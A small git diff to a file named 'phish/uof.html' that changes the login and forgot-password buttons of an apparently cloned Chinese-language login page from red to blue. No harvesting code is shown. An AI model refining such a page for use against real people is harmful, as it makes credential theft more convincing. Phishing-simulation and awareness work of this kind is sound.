--- a/phish/uof.html
+++ b/phish/uof.html
@@ -118,10 +118,10 @@
                  </div>
             </div>
             <div class="field">
-				 <input type="submit" name="btnSubmit" value="登入" tabindex="3" class="ui fluid large submit button red">
+				 <input type="submit" name="btnSubmit" value="登入" tabindex="3" class="ui fluid large submit button blue">
 			</div>
 			<div class="field">
-			<a id="hlForgetpw" class="ui icon fluid large button red">忘記密碼</a>
+			<a id="hlForgetpw" class="ui icon fluid large button blue">忘記密碼</a>
             </div>
   			<div class="field">
 				<div class="field">
